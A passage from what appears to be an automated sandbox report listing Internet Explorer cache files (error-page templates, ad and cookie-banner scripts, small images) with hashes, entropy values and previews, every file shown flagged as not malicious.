                                                                                                                                                                                                                                  SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1fdtSt[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                  Entropy (8bit):7.245257101036661
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                                                                                                                                                                                                  MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                                                                                                                                                                                                  SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                                                                                                                                                                                                  SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                                                                                                                                                                                                  SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1kvzy[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                  Entropy (8bit):7.749452105424938
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7eZ3IqhrinW+y2UXaxTaJgfcoG7QKJ7OZfhL3cp1pW2krS7BiArfss7P7UIQb:jVT2aCTjG8MOZR372/7iU7UIylHdLN
                                                                                                                                                                                                                                  MD5:C6E13630360E0B6D880AFDF3CD2A2204
                                                                                                                                                                                                                                  SHA1:63DCA80F76834F5A3FBE79F661678375239F72A4
                                                                                                                                                                                                                                  SHA-256:49767874BCF0F0648266F3018B5CCE3CA539B85778E5395D1212ACB114287D65
                                                                                                                                                                                                                                  SHA-512:CB8F7629DA131226146B12119C06A846A2EC9E9D069711711AC50CD7F31E321144E39270E82EA693E2FE9BFD1634841BF450173807AB6607794E2AF0EBE832C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB7gRE[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):501
                                                                                                                                                                                                                                  Entropy (8bit):7.3374462687222906
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                                                                                                                                                                                                  MD5:1FCA95AEED29D3219D0A53A78A041312
                                                                                                                                                                                                                                  SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                                                                                                                                                                                                  SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                                                                                                                                                                                                  SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBVuddh[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                                                  Entropy (8bit):6.917866057386609
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                                                                                                                                                                                                  MD5:636BACD8AA35BA805314755511D4CE04
                                                                                                                                                                                                                                  SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                                                                                                                                                                                                  SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                                                                                                                                                                                                  SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBlBV0U[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):542
                                                                                                                                                                                                                                  Entropy (8bit):7.476988192789716
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/uYnJg/tVJWJ7i7lwFdKad7mGmPbyAjKMOPdgI6t7:Wu26M0l5aMcAjdOlgI6t7
                                                                                                                                                                                                                                  MD5:8B760EC6573A9B19F6DB79E85C2C02C1
                                                                                                                                                                                                                                  SHA1:F76EDAAC77576BC4B03C3F2C80A1F97FA96EA820
                                                                                                                                                                                                                                  SHA-256:9A2405F53A961F5CC9160554578BE42A2E7053864DE3EC91874E8EA89D2A796C
                                                                                                                                                                                                                                  SHA-512:AC35B329BBB706581C3BF915B3843FCF06D1A758ACC5E41A5EF1D1E60A0080E0E96959339FF40163F5CD34EF97DFB100A33F7A4F6E43149BDE254D1FDAC6F59B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\cfdbd9[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\dnserror[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2997
                                                                                                                                                                                                                                  Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                                  MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\down[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):748
                                                                                                                                                                                                                                  Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\errorPageStrings[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12105
                                                                                                                                                                                                                                  Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                                  MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                                                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\medianet[3].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):400969
                                                                                                                                                                                                                                  Entropy (8bit):5.488021588546488
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:zF0kYqP1vG2jnmuynGJ8nKM03VCuPbxErMrSN9Gm9:j1vFjKnGJ8KMGxTwM+fGm9
                                                                                                                                                                                                                                  MD5:68E079D4A2C9D67DE98DBFB4FD58680C
                                                                                                                                                                                                                                  SHA1:6A19B91952CCB14DCF97FA49969807CF51737E5E
                                                                                                                                                                                                                                  SHA-256:966A1197CDA564B5167642991A2602D4F2B5894018171BB97D34D906CC5CB597
                                                                                                                                                                                                                                  SHA-512:C0962EF46C92BAC7F4314E36E4B880453F8110B113BB283B49061F0562F2BFE2B84EF27F13099FCC2E8EE0FA900D8861CBC1DCB3B47D3C41C25AB47E5E4070B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\medianet[4].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):400969
                                                                                                                                                                                                                                  Entropy (8bit):5.488011262931147
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:zF0kYqP1vG2jnmuynGJ8nKM03VCuPbXErMrSN9Gm9:j1vFjKnGJ8KMGxTyM+fGm9
                                                                                                                                                                                                                                  MD5:94B6210A06ABE3EAFE471EF66E7F3FCB
                                                                                                                                                                                                                                  SHA1:8411EC010633C2A7CA7E8DAC32AAB8722D837075
                                                                                                                                                                                                                                  SHA-256:DBDDB9CB27544B3A0AC8173A27A12ABBE423E687CD0DB2496A8F404E07EC3ADC
                                                                                                                                                                                                                                  SHA-512:70F346CC5AA74A12B21D6C0B13B1D581BB584E88B755E58DE4524A62F15A42CA0F083EA4AE769D1C060E129BDB81B174DC777F616B0099BBDC262B3F7370E1BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\nrrV27452[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):90611
                                                                                                                                                                                                                                  Entropy (8bit):5.421500848741912
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                                                                                                                                                                                                                  MD5:1EB648466B92897E80D5F3A64D02C011
                                                                                                                                                                                                                                  SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                                                                                                                                                                                                                  SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                                                                                                                                                                                                                  SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\otBannerSdk[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):374818
                                                                                                                                                                                                                                  Entropy (8bit):5.338137698375348
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                                                                                                                                                                                                                  MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                                                                                                                                                                                                                  SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                                                                                                                                                                                                                  SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                                                                                                                                                                                                                  SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: /** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\otFlat[1].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12282
                                                                                                                                                                                                                                  Entropy (8bit):5.246783630735545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
                                                                                                                                                                                                                                  MD5:A7049025D23AEC458F406F190D31D68C
                                                                                                                                                                                                                                  SHA1:450BC57E9C44FB45AD7DC826EB523E85B9E05944
                                                                                                                                                                                                                                  SHA-256:101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
                                                                                                                                                                                                                                  SHA-512:EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .. {.. "name": "otFlat",..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\otPcCenter[1].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47714
                                                                                                                                                                                                                                  Entropy (8bit):5.565687858735718
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
                                                                                                                                                                                                                                  MD5:8EC5B25A65A667DB4AC3872793B7ACD2
                                                                                                                                                                                                                                  SHA1:6B67117F21B0EF4B08FE81EF482B888396BBB805
                                                                                                                                                                                                                                  SHA-256:F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
                                                                                                                                                                                                                                  SHA-512:1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .. {.. "name": "otPcCenter",..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\otSDKStub[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16853
                                                                                                                                                                                                                                  Entropy (8bit):5.393243893610489
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                                                                                                                                                                                                                  MD5:82566994A83436F3BDD00843109068A7
                                                                                                                                                                                                                                  SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                                                                                                                                                                                                                  SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                                                                                                                                                                                                                  SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\px[1].gif
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                  Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                  MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                  SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                  SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                  SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2955
                                                                                                                                                                                                                                  Entropy (8bit):4.796538193381466
                                                                                                                                                                                                                                  Encrypted:false
